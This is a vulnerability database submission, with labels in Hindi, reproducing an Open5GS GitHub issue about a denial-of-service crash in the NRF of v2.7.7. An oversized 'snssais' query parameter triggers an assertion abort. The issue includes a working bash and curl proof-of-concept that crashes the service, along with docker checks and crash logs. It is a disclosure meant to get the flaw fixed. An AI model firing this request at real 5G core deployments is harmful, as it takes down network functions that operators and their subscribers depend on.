| शीर्षक | Open5gs NRF v2.7.7 Denial of Service |
|---|
| विवरण | ### Open5GS Release, Revision, or Tag
v2.7.7
### Steps to reproduce
### Description
NRF crashes when the `snssais` discovery query parameter contains more entries
than `OGS_MAX_NUM_OF_SLICE`.
The discovery query parser eventually calls:
```c
ogs_assert(discovery_option->num_of_snssais < OGS_MAX_NUM_OF_SLICE);
```
which makes an oversized `snssais` query abort the process.
### Steps to reproduce
```bash
snssais='['
for i in $(seq 1 20); do
snssais="$snssais{\"sst\":1,\"sd\":\"000001\"},"
done
snssais=${snssais%,}
snssais="$snssais]"
curl --http2-prior-knowledge -m 5 -sS -i --get \
'http://10.33.33.3/nnrf-disc/v1/nf-instances' \
--data-urlencode 'target-nf-type=SMF' \
--data-urlencode 'requester-nf-type=AMF' \
--data-urlencode "snssais=$snssais"
```
Then check:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --since 2026-04-10T17:24:20Z nrf | tail -40
```
### Logs
```shell
curl: (56) Recv failure: Connection reset by peer
exited 139 2026-04-10T17:24:21.881998907Z
04/10 17:24:21.791: [sbi] FATAL: ogs_sbi_discovery_option_add_snssais: Assertion `discovery_option->num_of_snssais < OGS_MAX_NUM_OF_SLICE' failed. (../lib/sbi/message.c:3723)
```
### Expected behaviour
NRF should reject oversized `snssais` input with a normal HTTP error response.
### Observed Behaviour
The connection is reset and the NRF process exits with code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| स्रोत | ⚠️ https://github.com/open5gs/open5gs/issues/4461 |
|---|
| उपयोगकर्ता | LinJu (UID 97503) |
|---|
| सबमिशन | 20/04/2026 09:52 PM (1 महीना पहले) |
|---|
| संयम | 16/05/2026 12:09 PM (26 days later) |
|---|
| स्थिति | प्रतिलिपि |
|---|
| VulDB प्रविष्टि | 364318 [Open5GS तक 2.7.7 NRF /lib/sbi/message.c service-names/snssais सेवा अस्वीकार] |
|---|
| अंक | 0 |
|---|